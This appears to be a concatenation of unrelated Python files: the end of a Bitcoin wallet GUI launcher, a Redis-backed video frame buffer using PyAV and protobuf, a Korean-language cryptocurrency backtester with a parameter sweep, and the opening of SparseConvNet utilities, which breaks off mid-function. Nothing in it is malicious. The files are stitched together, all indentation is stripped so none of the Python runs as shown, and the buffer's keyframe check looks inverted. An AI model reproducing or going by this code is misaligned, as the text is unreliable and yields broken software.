QAPP.setFont(GETFONT('var'))
TheSDM = SatoshiDaemonManager()
form = ArmoryMainWindow(splashScreen=SPLASH)
form.show()
SPLASH.finish(form)
QAPP.setQuitOnLastWindowClosed(True)
os._exit(QAPP.exec_())
|
inmemory_buffer.py
|
# Copyright 2020 Wearless Tech Inc All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from typing import MutableSequence
import av
import base64
import redis
import json
import sys
import io
import numpy as np
import time
from proto import video_streaming_pb2
import multiprocessing
# constants from global vars
from global_vars import RedisInMemoryBufferChannel,RedisInMemoryDecodedImagesPrefix, RedisInMemoryIFrameListPrefix,RedisCodecVideoInfo,RedisInMemoryQueuePrefix
def memoryCleanup(redis_conn, device_id):
'''
Cleanup redis memory
'''
redis_conn.delete(RedisInMemoryQueuePrefix+device_id) # the complete memory buffer of compressed stream
redis_conn.delete(RedisInMemoryIFrameListPrefix+device_id) # all keys for stored i-frames
redis_conn.delete(RedisInMemoryDecodedImagesPrefix+device_id) # all decoded in-memory buffer images
def setCodecInfo(redis_conn, in_av_container,deviceId):
'''
Sets the current stream's codec info in Redis so that consumers can later recreate a matching decoder
'''
streams = in_av_container.streams
if len(streams) > 0:
for stream in streams:
if stream.type == "video":
codec_ctx = stream.codec_context
vc = video_streaming_pb2.VideoCodec()
vc.name = codec_ctx.name
vc.long_name = codec_ctx.codec.long_name
vc.width = codec_ctx.width
vc.height = codec_ctx.height
vc.pix_fmt = codec_ctx.pix_fmt
vc.extradata = codec_ctx.extradata
vc.extradata_size = codec_ctx.extradata_size
vcData = vc.SerializeToString()
redis_conn.set(RedisCodecVideoInfo+deviceId, vcData)
def getCodecInfo(redis_conn, deviceId):
'''
Reads the current video stream's codec info from redis; returns None when it has not been set yet
'''
info = redis_conn.get(RedisCodecVideoInfo+deviceId)
if info is not None:
vc = video_streaming_pb2.VideoCodec()
vc.ParseFromString(info)
return vc
return None
def packetToInMemoryBuffer(redis_conn,memory_buffer_size, device_id,in_av_container, packet):
if memory_buffer_size > 0:
redisStreamName = RedisInMemoryQueuePrefix + device_id
redisIFrameList = RedisInMemoryIFrameListPrefix + device_id
for stream in in_av_container.streams:
if stream.type == "video":
codec_ctx = stream.codec_context
video_height = codec_ctx.height
video_width = codec_ctx.width
is_keyframe = packet.is_keyframe
packetBytes = packet.to_bytes()
codec_name = codec_ctx.name
pix_fmt = codec_ctx.pix_fmt
vf = video_streaming_pb2.VideoFrame()
vf.data = packetBytes
vf.width = video_width
vf.height = video_height
vf.timestamp = int(packet.pts * float(packet.time_base))
vf.pts = packet.pts
vf.dts = packet.dts
vf.keyframe = is_keyframe
vf.time_base = float(packet.time_base)
vf.is_keyframe = packet.is_keyframe
vf.is_corrupt = packet.is_corrupt
vf.codec_name = codec_name
vf.pix_fmt = pix_fmt
vfData = vf.SerializeToString()
keyframe = 0
if is_keyframe:
keyframe = 1
redis_conn.xadd(redisIFrameList, {'keyframe':keyframe}, maxlen=memory_buffer_size)
redis_conn.xadd(redisStreamName, {'data': vfData, 'is_keyframe': keyframe}, maxlen=memory_buffer_size)
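# Usage sketch (editor's note, illustrative only): how setCodecInfo and
# packetToInMemoryBuffer might be fed from a PyAV demux loop. The name
# "stream_url" and the buffer size of 1000 are assumptions, not part of
# this module; the helper below is defined here but never called.
def _example_fill_buffer(redis_conn, stream_url, device_id):
    container = av.open(stream_url)
    setCodecInfo(redis_conn, container, device_id)
    for packet in container.demux(video=0):
        if packet.dts is None:
            continue  # skip PyAV's end-of-stream flush packet
        packetToInMemoryBuffer(redis_conn, 1000, device_id, container, packet)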
class InMemoryBuffer(threading.Thread):
'''
InMemoryBuffer stores packet by packet incoming video stream to redis queue
'''
def __init__(self, device_id, memory_scale, redis_conn):
threading.Thread.__init__(self)
self.__redis_conn = redis_conn
self.__device_id = device_id
self.__filter_scale = memory_scale
def run(self):
codec_info = getCodecInfo(self.__redis_conn, self.__device_id)
while codec_info is None:
codec_info = getCodecInfo(self.__redis_conn, self.__device_id)
time.sleep(0.1)
ps = self.__redis_conn.pubsub()
ps.subscribe(RedisInMemoryBufferChannel)
for psMsg in ps.listen():
if "data" in psMsg:
base64Msg = psMsg["data"]
if isinstance(base64Msg, (bytes, bytearray)):
data = json.loads(base64.b64decode(base64Msg))
if "deviceId" in data:
deviceId = data["deviceId"]
fromTs = data["fromTimestamp"]
toTs = data["toTimestamp"]
requestID = data["requestId"]
p = multiprocessing.Process(target=self.query_results, args=(codec_info, requestID, deviceId, fromTs, toTs, ))
p.daemon = True
p.start()
# we don't wait for the process to finish here. It should finish on its own or fail
def query_results(self, codec_info, requestID, deviceId, fromTs, toTs):
decoder = av.CodecContext.create(codec_info.name,'r')
decoder.width = codec_info.width
decoder.height = codec_info.height
decoder.pix_fmt = codec_info.pix_fmt
decoder.extradata = codec_info.extradata # important for decoding (PPS, SPS)
decoder.thread_type = 'AUTO'
# print("Available filters: ", av.filter.filters_available)
# set up the default scaling filter graph for the in-memory queue
graph = av.filter.Graph()
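# Filter chain built below: buffer (decoded frames in) -> scale (resized by
# self.__filter_scale, an ffmpeg scale argument such as "640:360" -- example
# value, assumed for illustration) -> buffersink (scaled frames out).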
fchain = [graph.add_buffer(width=codec_info.width, height=codec_info.height, format=codec_info.pix_fmt, name=requestID)]
fchain.append(graph.add("scale",self.__filter_scale))
fchain[-2].link_to(fchain[-1])
fchain.append(graph.add('buffersink'))
fchain[-2].link_to(fchain[-1])
graph.configure()
decodedStreamName = RedisInMemoryDecodedImagesPrefix + deviceId + requestID
iframeStreamName = RedisInMemoryIFrameListPrefix + deviceId
# this is where we start our query
queryTs = self.findClosestIFrameTimestamp(iframeStreamName, fromTs)
print("Starting to decode in-memory GOP: ", deviceId, fromTs, toTs, queryTs)
streamName = RedisInMemoryQueuePrefix + deviceId
# sanity check for timestampTo
redis_time = self.__redis_conn.time()
redis_time = int(redis_time[0] + (redis_time[1] / 1000000)) * 1000
if toTs > redis_time:
toTs = redis_time
firstIFrameFound = False # used when fromTs predates everything in the queue (so the first I-frame is picked)
while True:
buffer = self.__redis_conn.xread({streamName: queryTs}, count=30)
if len(buffer) > 0:
arr = buffer[0]
inner_buffer = arr[1]
last = inner_buffer[-1]
queryTs = last[0] # remember where to query from next
# check if we've read everything, exit loop
last = int(queryTs.decode('utf-8').split("-")[0])
if last >= int(toTs):
print("inmemory buffer decoding finished")
break
for compressed in inner_buffer:
compressedData = compressed[1]
content = {}
for key, value in compressedData.items():
content[key.decode("utf-8")] = value
if content["is_keyframe"].decode('utf-8') == "0" and firstIFrameFound is False:
print("First I-Frame found")
firstIFrameFound = True
if not firstIFrameFound:
print("skipping first I-Frame search, going next")
continue
vf = video_streaming_pb2.VideoFrame()
vf.ParseFromString(content["data"])
frame_buf = io.BytesIO(vf.data)
size = frame_buf.getbuffer().nbytes
packet = av.Packet(size)
frame_buf.readinto(packet)
# packet.pts = vf.pts
# packet.dts = vf.dts
frames = decoder.decode(packet) or () # should be only 1 frame per packet (for video)
if len(frames) <= 0:
continue
self.addToRedisDecodedImage(graph, decodedStreamName, frames, packet)
# signal finish (None video frame)
self.addToRedisDecodedImage(graph, decodedStreamName, None, None)
# finding the closest timestamp, allowing queries such as timeFrom=0 and timeTo=sys.maxsize
def findClosestIFrameTimestamp(self, streamName, fromTs):
'''
Finds the I-frame timestamp at or immediately before fromTs in the small queue of I-frame entries
'''
searchTs = fromTs
min_dist = sys.maxsize
all_i_frames = self.__redis_conn.xread({streamName:0}) # read all in queue
if len(all_i_frames) > 0:
stream_entry = all_i_frames[0]
if len(stream_entry) > 1:
iframe_timestamps = stream_entry[1]
for (i, iframe_ts) in enumerate(iframe_timestamps):
its = str(iframe_ts[0], 'utf-8')
ts = int(its.split("-")[0])
if i == 0:
searchTs = its
continue
if ts >= int(fromTs): # stop search (we want only I-frame before fromTs)
break
# we're always looking for an iframe before fromTs
min_abs_candidate = abs(int(fromTs) - ts)
if min_abs_candidate < min_dist:
searchTs = its
min_dist = min_abs_candidate
# (- 1 ms since xread is exclusive)
splitted = searchTs.split("-")
ts = splitted[0]
tsPart = splitted[1]
print("found key frame: ", ts, tsPart)
return str(int(ts)-1) + "-" + tsPart
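# Example for the method above (illustrative): with a single I-frame entry
# keyed "1650000000000-0" and fromTs=1650000000500, it returns
# "1649999999999-0", so the exclusive xread in query_results starts exactly
# at the keyframe entry.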
def addToRedisDecodedImage(self, graph, streamName, frames, packet):
'''
Converting the raw frames to Protobuf shape and extracting timing info from the packet
'''
if frames is None: # signal finish of in-memory buffer read
vf = video_streaming_pb2.VideoFrame()
vfData = vf.SerializeToString()
self.pushDecodedToRedis(streamName, vfData)
return
# push decoded frames to redis to be read by server and served back through GRPC
for frame in frames:
graph.push(frame)
keepPulling = True
while keepPulling:
try:
frame = graph.pull()
img = frame.to_ndarray(format='bgr24')
shape = img.shape
img_bytes = np.ndarray.tobytes(img)
timestamp = int(time.time() * 1000)
if packet.pts is not None and packet.time_base is not None:
timestamp = int(packet.pts * float(packet.time_base))
vf = video_streaming_pb2.VideoFrame()
vf.data = img_bytes
vf.width = frame.width
vf.height = frame.height
vf.timestamp = timestamp
vf.frame_type = frame.pict_type.name
if packet.pts:
vf.pts = packet.pts
if packet.dts:
vf.dts = packet.dts
if packet.time_base is not None:
vf.time_base = float(packet.time_base)
vf.is_keyframe = packet.is_keyframe
vf.is_corrupt = packet.is_corrupt
for (i,dim) in enumerate(shape):
newDim = video_streaming_pb2.ShapeProto.Dim()
newDim.size = dim
newDim.name = str(i)
vf.shape.dim.append(newDim)
vfData = vf.SerializeToString()
self.pushDecodedToRedis(streamName, vfData)
except Exception:
# the buffersink raises once the graph is drained; stop pulling
keepPulling = False
def pushDecodedToRedis(self, streamName, vfData):
'''
Push the frame protobuf to redis into xstream.
The max size of decoded xstream is 10 images (to limit memory consumption)
This buffer is being continuously emptied by the server upon each read
'''
# in case reading is slow, this waits until some memory is freed
# (raw images are stored in memory; e.g. an 800x600 BGR24 frame is roughly 1.4MB)
started_check = int(time.time() * 1000)
while True:
# safety - if reading takes really long (more than 10 seconds), exit immediately
current_check = int(time.time() * 1000)
if current_check - started_check > (1000 * 10):
break
cnt = self.__redis_conn.xlen(streamName)
if cnt >= 10:
time.sleep(0.1)
else:
break
self.__redis_conn.xadd(streamName, {'data': vfData}, maxlen=10)
|
backtester_coin_vc.py
|
import os
import sys
import sqlite3
import pandas as pd
from matplotlib import pyplot as plt
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.static import now, strf_time, timedelta_day
from utility.setting import db_setting, db_backtest, db_coin_tick, graph_path
class BackTester2Coin:
def __init__(self, q_, ticker_list_, num_, high):
self.q = q_
self.ticker_list = ticker_list_
self.high = high
if isinstance(num_[3], list):
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3][0]
self.avg_time = num_[4][0]
self.gap_sm = num_[5][0]
self.ch_low = num_[6][0]
self.dm_low = num_[7][0]
self.per_low = num_[8][0]
self.per_high = num_[9][0]
self.cs_per = num_[10][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3]
self.avg_time = num_[4]
self.gap_sm = num_[5]
self.ch_low = num_[6]
self.dm_low = num_[7]
self.per_low = num_[8]
self.per_high = num_[9]
self.cs_per = num_[10]
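# num_ layout: [batting, testperiod, totaltime, gap_ch, avg_time, gap_sm,
# ch_low, dm_low, per_low, per_high, cs_per]; during the optimisation sweep
# each tuning value arrives as a [start, stop, step, fine_step] list, hence
# the branch above takes element [0] in that case.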
self.ticker = None
self.df = None
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
self.csell = 0
self.Start()
def Start(self):
conn = sqlite3.connect(db_coin_tick)
tcount = len(self.ticker_list)
int_daylimit = int(strf_time('%Y%m%d', timedelta_day(-self.testperiod)))
for k, ticker in enumerate(self.ticker_list):
self.ticker = ticker
self.df = pd.read_sql(f"SELECT * FROM '{ticker}'", conn)
self.df = self.df.set_index('index')
self.df['고저평균대비등락율'] = (self.df['현재가'] / ((self.df['고가'] + self.df['저가']) / 2) - 1) * 100
self.df['고저평균대비등락율'] = self.df['고저평균대비등락율'].round(2)
self.df['체결강도'] = self.df['누적매수량'] / self.df['누적매도량'] * 100
self.df['체결강도'] = self.df['체결강도'].round(2)
self.df['직전체결강도'] = self.df['체결강도'].shift(1)
self.df['직전누적거래대금'] = self.df['누적거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['거래대금'] = self.df['누적거래대금'] - self.df['직전누적거래대금']
self.df['직전거래대금'] = self.df['거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['거래대금평균'] = self.df['직전거래대금'].rolling(window=self.avg_time).mean()
self.df['체결강도평균'] = self.df['직전체결강도'].rolling(window=self.avg_time).mean()
self.df['최고체결강도'] = self.df['직전체결강도'].rolling(window=self.avg_time).max()
self.df = self.df.fillna(0)
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.ccond = 0
lasth = len(self.df) - 1
for h, index in enumerate(self.df.index):
if h != 0 and index[:8] != self.df.index[h - 1][:8]:
self.ccond = 0
if int(index[:8]) < int_daylimit or \
(not self.hold and (210000 <= int(index[8:]) or int(index[8:]) < 10000)):
continue
self.index = index
self.indexn = h
self.ccond += 1
if not self.hold and 10000 < int(index[8:]) < 210000 and self.BuyTerm():
self.Buy()
elif self.hold and 10000 < int(index[8:]) < 210000 and self.SellTerm():
self.Sell()
elif self.hold and (h == lasth or int(index[8:]) >= 210000 > int(self.df.index[h - 1][8:])):
self.Sell()
self.Report(k + 1, tcount)
conn.close()
def BuyTerm(self):
if isinstance(self.df['현재가'][self.index], pd.Series):
return False
if self.ccond < self.avg_time:
return False
# strategy details withheld (not public)
return True
def Buy(self):
if self.df['매도호가1'][self.index] * self.df['매도잔량1'][self.index] >= self.batting:
s1hg = self.df['매도호가1'][self.index]
self.buycount = int(self.batting / s1hg)
self.buyprice = s1hg
else:
s1hg = self.df['매도호가1'][self.index]
s1jr = self.df['매도잔량1'][self.index]
s2hg = self.df['매도호가2'][self.index]
ng = self.batting - s1hg * s1jr
s2jc = int(ng / s2hg)
self.buycount = s1jr + s2jc
self.buyprice = round((s1hg * s1jr + s2hg * s2jc) / self.buycount, 2)
if self.buycount == 0:
return
self.hold = True
self.indexb = self.indexn
self.csell = 0
def SellTerm(self):
if isinstance(self.df['현재가'][self.index], pd.Series):
return False
if self.df['등락율'][self.index] > 29:
return True
bg = self.buycount * self.buyprice
cg = self.buycount * self.df['현재가'][self.index]
eyun, per = self.GetEyunPer(bg, cg)
# strategy details withheld (not public)
return False
def Sell(self):
if self.df['매수잔량1'][self.index] >= self.buycount:
self.sellprice = self.df['매수호가1'][self.index]
else:
b1hg = self.df['매수호가1'][self.index]
b1jr = self.df['매수잔량1'][self.index]
b2hg = self.df['매수호가2'][self.index]
nc = self.buycount - b1jr
self.sellprice = round((b1hg * b1jr + b2hg * nc) / self.buycount, 2)
self.hold = False
self.CalculationEyun()
self.indexb = 0
def CalculationEyun(self):
self.totalcount += 1
bg = self.buycount * self.buyprice
cg = self.buycount * self.sellprice
eyun, per = self.GetEyunPer(bg, cg)
self.totalper = round(self.totalper + per, 2)
self.totaleyun = int(self.totaleyun + eyun)
self.totalholdday += self.indexn - self.indexb
if per > 0:
self.totalcount_p += 1
else:
self.totalcount_m += 1
if self.high:
self.q.put([self.index, self.ticker, per, eyun])
# noinspection PyMethodMayBeStatic
def GetEyunPer(self, bg, cg):
gtexs = cg * 0.0023
gsfee = cg * 0.00015
gbfee = bg * 0.00015
texs = gtexs - (gtexs % 1)
sfee = gsfee - (gsfee % 10)
bfee = gbfee - (gbfee % 10)
pg = int(cg - texs - sfee - bfee)
eyun = pg - bg
per = round(eyun / bg * 100, 2)
return eyun, per
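# Worked example (illustrative): bg=1,000,000 and cg=1,010,000 KRW give
# gross tax 1,010,000*0.0023 = 2,323.0 and gross fees 151.5 (sell) /
# 150.0 (buy); after truncation texs=2,323, sfee=150, bfee=150, so
# pg = 1,007,377, eyun = 7,377 and per = 0.74%.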
def Report(self, count, tcount):
if self.totalcount > 0:
plus_per = round((self.totalcount_p / self.totalcount) * 100, 2)
avgholdday = round(self.totalholdday / self.totalcount, 2)
self.q.put([self.ticker, self.totalcount, avgholdday, self.totalcount_p, self.totalcount_m,
plus_per, self.totalper, self.totaleyun])
ticker, totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun = \
self.GetTotal(plus_per, avgholdday)
print(f" 종목코드 {ticker} | 평균보유기간 {avgholdday}초 | 거래횟수 {totalcount}회 | "
f" 익절 {totalcount_p}회 | 손절 {totalcount_m}회 | 승률 {plus_per}% |"
f" 수익률 {totalper}% | 수익금 {totaleyun}원 [{count}/{tcount}]")
else:
self.q.put([self.ticker, 0, 0, 0, 0, 0., 0., 0])
def GetTotal(self, plus_per, avgholdday):
ticker = str(self.ticker)
ticker = ticker + ' ' if len(ticker) == 6 else ticker
ticker = ticker + ' ' if len(ticker) == 7 else ticker
ticker = ticker + ' ' if len(ticker) == 8 else ticker
ticker = ticker + ' ' if len(ticker) == 9 else ticker
totalcount = str(self.totalcount)
totalcount = ' ' + totalcount if len(totalcount) == 1 else totalcount
totalcount = ' ' + totalcount if len(totalcount) == 2 else totalcount
avgholdday = str(avgholdday)
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 1 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 2 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 3 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 4 else avgholdday
avgholdday = avgholdday + '0' if len(avgholdday.split('.')[1]) == 1 else avgholdday
totalcount_p = str(self.totalcount_p)
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 1 else totalcount_p
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 2 else totalcount_p
totalcount_m = str(self.totalcount_m)
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 1 else totalcount_m
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 2 else totalcount_m
plus_per = str(plus_per)
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 1 else plus_per
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 2 else plus_per
plus_per = plus_per + '0' if len(plus_per.split('.')[1]) == 1 else plus_per
totalper = str(self.totalper)
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 1 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 2 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 3 else totalper
totalper = totalper + '0' if len(totalper.split('.')[1]) == 1 else totalper
totaleyun = format(self.totaleyun, ',')
if len(totaleyun.split(',')) == 1:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 2:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 3:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
return ticker, totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun
class Total:
def __init__(self, q_, last_, num_):
super().__init__()
self.q = q_
self.last = last_
if isinstance(num_[3], list):
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3][0]
self.avg_time = num_[4][0]
self.gap_sm = num_[5][0]
self.ch_low = num_[6][0]
self.dm_low = num_[7][0]
self.per_low = num_[8][0]
self.per_high = num_[9][0]
self.cs_per = num_[10][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3]
self.avg_time = num_[4]
self.gap_sm = num_[5]
self.ch_low = num_[6]
self.dm_low = num_[7]
self.per_low = num_[8]
self.per_high = num_[9]
self.cs_per = num_[10]
self.Start()
def Start(self):
columns1 = ['거래횟수', '평균보유기간', '익절', '손절', '승률', '수익률', '수익금']
columns2 = ['필요자금', '종목출현빈도수', '거래횟수', '평균보유기간', '익절', '손절', '승률',
'평균수익률', '수익률합계', '수익금합계', '체결강도차이', '평균시간', '거래대금차이',
'체결강도하한', '누적거래대금하한', '등락율하한', '등락율상한', '청산수익률']
df_back = pd.DataFrame(columns=columns1)
df_tsg = pd.DataFrame(columns=['종목명', 'per', 'ttsg'])
k = 0
while True:
data = self.q.get()
if len(data) == 4:
if data[0] in df_tsg.index:
df_tsg.at[data[0]] = df_tsg['종목명'][data[0]] + ';' + data[1], \
df_tsg['per'][data[0]] + data[2], \
df_tsg['ttsg'][data[0]] + data[3]
else:
df_tsg.at[data[0]] = data[1], data[2], data[3]
else:
df_back.at[data[0]] = data[1], data[2], data[3], data[4], data[5], data[6], data[7]
k += 1
if k == self.last:
break
tsp = 0
if len(df_back) > 0:
text = [self.gap_ch, self.avg_time, self.gap_sm, self.ch_low, self.dm_low,
self.per_low, self.per_high, self.cs_per]
print(f' {text}')
tc = df_back['거래횟수'].sum()
if tc != 0:
pc = df_back['익절'].sum()
mc = df_back['손절'].sum()
pper = round(pc / tc * 100, 2)
df_back_ = df_back[df_back['평균보유기간'] != 0]
avghold = round(df_back_['평균보유기간'].sum() / len(df_back_), 2)
avgsp = round(df_back['수익률'].sum() / tc, 2)
tsg = int(df_back['수익금'].sum())
onedaycount = round(tc / self.totaltime, 4)
onegm = int(self.batting * onedaycount * avghold)
if onegm < self.batting:
onegm = self.batting
tsp = round(tsg / onegm * 100, 4)
text = f" 종목당 배팅금액 {format(self.batting, ',')}원, 필요자금 {format(onegm, ',')}원, "\
f" 종목출현빈도수 {onedaycount}개/초, 거래횟수 {tc}회, 평균보유기간 {avghold}초,\n 익절 {pc}회, "\
f" 손절 {mc}회, 승률 {pper}%, 평균수익률 {avgsp}%, 수익률합계 {tsp}%, 수익금합계 {format(tsg, ',')}원"
print(text)
df_back = pd.DataFrame(
[[onegm, onedaycount, tc, avghold, pc, mc, pper, avgsp, tsp, tsg, self.gap_ch, self.avg_time,
self.gap_sm, self.ch_low, self.dm_low, self.per_low, self.per_high, self.cs_per]],
columns=columns2, index=[strf_time('%Y%m%d%H%M%S')])
conn = sqlite3.connect(db_backtest)
df_back.to_sql(f"{strf_time('%Y%m%d')}_2c", conn, if_exists='append', chunksize=1000)
conn.close()
if len(df_tsg) > 0:
df_tsg['체결시간'] = df_tsg.index
df_tsg.sort_values(by=['체결시간'], inplace=True)
df_tsg['ttsg_cumsum'] = df_tsg['ttsg'].cumsum()
df_tsg[['ttsg', 'ttsg_cumsum']] = df_tsg[['ttsg', 'ttsg_cumsum']].astype(int)
conn = sqlite3.connect(db_backtest)
df_tsg.to_sql(f"{strf_time('%Y%m%d')}_2t", conn, if_exists='replace', chunksize=1000)
conn.close()
df_tsg.plot(figsize=(12, 9), rot=45)
plt.savefig(f"{graph_path}/C{strf_time('%Y%m%d')}_2.png")
conn = sqlite3.connect(db_setting)
cur = conn.cursor()
query = f"UPDATE coin SET 체결강도차이2 = {self.gap_ch}, 평균시간2 = {self.avg_time}, "\
f"거래대금차이2 = {self.gap_sm}, 체결강도하한2 = {self.ch_low}, 누적거래대금하한2 = {self.dm_low}, "\
f"등락율하한2 = {self.per_low}, 등락율상한2 = {self.per_high}, 청산수익률2 = {self.cs_per}"
cur.execute(query)
conn.commit()
conn.close()
else:
self.q.put(tsp)
if __name__ == "__main__":
start = now()
con = sqlite3.connect(db_coin_tick)
df = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
con.close()
table_list = list(df['name'].values)
last = len(table_list)
q = Queue()
batting = int(sys.argv[1]) * 1000000
testperiod = int(sys.argv[2])
totaltime = int(sys.argv[3])
gap_chs = [float(sys.argv[4]), float(sys.argv[5]), float(sys.argv[6]),
float(sys.argv[7]), float(sys.argv[8]), float(sys.argv[9]), float(sys.argv[10])]
avg_times = [int(sys.argv[13]), int(sys.argv[14]), int(sys.argv[15]),
int(sys.argv[16]), int(sys.argv[17]), int(sys.argv[18])]
htsp = -1000
high_var = []
print(int(sys.argv[21]))
for gap_ch in gap_chs:
for avg_time in avg_times:
num = [batting, testperiod, totaltime, gap_ch, avg_time, int(sys.argv[21]), float(sys.argv[25]),
int(sys.argv[29]), float(sys.argv[33]), float(sys.argv[37]), float(sys.argv[41])]
w = Process(target=Total, args=(q, last, num))
w.start()
procs = []
workcount = int(last / int(sys.argv[45])) + 1
for j in range(0, last, workcount):
ticker_list = table_list[j:j + workcount]
p = Process(target=BackTester2Coin, args=(q, ticker_list, num, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num
print(f' new best total return {htsp}%')
gap_ch = [high_var[3] - float(sys.argv[11]) * 9, high_var[3] + float(sys.argv[11]) * 9,
float(sys.argv[11]), float(sys.argv[12])]
avg_time = [high_var[4], high_var[4], int(sys.argv[19]), int(sys.argv[20])]
gap_sm = [int(sys.argv[21]), int(sys.argv[22]), int(sys.argv[23]), int(sys.argv[24])]
ch_low = [float(sys.argv[25]), float(sys.argv[26]), float(sys.argv[27]), float(sys.argv[28])]
dm_low = [int(sys.argv[29]), int(sys.argv[30]), int(sys.argv[31]), int(sys.argv[32])]
per_low = [float(sys.argv[33]), float(sys.argv[34]), float(sys.argv[35]), float(sys.argv[36])]
per_high = [float(sys.argv[37]), float(sys.argv[38]), float(sys.argv[39]), float(sys.argv[40])]
cs_per = [float(sys.argv[41]), float(sys.argv[42]), float(sys.argv[43]), float(sys.argv[44])]
num = [batting, testperiod, totaltime, gap_ch, avg_time, gap_sm, ch_low, dm_low, per_low, per_high, cs_per]
ogin_var = high_var[3]
high_var = high_var[3]
i = 3
while True:
w = Process(target=Total, args=(q, last, num))
w.start()
procs = []
workcount = int(last / int(sys.argv[45])) + 1
for j in range(0, last, workcount):
ticker_list = table_list[j:j + workcount]
p = Process(target=BackTester2Coin, args=(q, ticker_list, num, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num[i][0]
print(f' new best total return {htsp}%')
if num[i][0] == num[i][1]:
num[i][0] = high_var
if num[i][2] != num[i][3]:
if num[i][0] != ogin_var:
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
elif i < len(num) - 1:
i += 1
ogin_var = num[i][0]
high_var = num[i][0]
if i == 4:
if num[i][0] != int(sys.argv[13]):
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
else:
break
num[i][0] = round(num[i][0] + num[i][2], 1)
w = Process(target=Total, args=(q, last, num))
w.start()
procs = []
workcount = int(last / float(sys.argv[45])) + 1
for j in range(0, last, workcount):
db_list = table_list[j:j + workcount]
p = Process(target=BackTester2Coin, args=(q, db_list, num, True))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f" 백테스팅 소요시간 {end - start}")
|
utils.py
|
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import torch, glob, os, math, numpy as np
from .sparseConvNetTensor import SparseConvNetTensor
from .metadata import Metadata
def toLongTensor(dimension, x):
if hasattr(x, 'type') and x.type() == 'torch.LongTensor':
return x
elif isinstance(x, (list, tuple)):
assert len(x) == dimension
return torch.LongTensor(x)
else:
return torch.LongTensor(dimension).fill_(x)
def optionalTensor(a, b):
return getattr(a, b) if hasattr(a, b) else torch.Tensor()
def optionalTensorReturn(a):
return a if a.numel() else None
def threadDatasetIterator(d):
try:
import queue
except BaseException:
import Queue as queue
import threading
def iterator():
def worker(i):
for k in range(i, len(d), 8):
q.put(d[k])
q = queue.Queue(16)
for i in range(8):
t = threading.Thread(target=worker, args=(i,))
t.start()
for _ in range(len(d)):
item = q.get()
yield item
q.task_done()
q.join()
return iterator
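# Usage sketch (illustrative): wraps an indexable dataset so items are
# prefetched by 8 worker threads through a bounded Queue(16); my_dataset
# and process() below are hypothetical names:
#   for item in threadDatasetIterator(my_dataset)():
#       process(item)
# Note that items arrive in completion order, not necessarily index order.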
def concatenate_feature_planes(input):
output = SparseConvNetTensor()
output.metadata = input[0].metadata
output.spatial_size = input[0].spatial_size
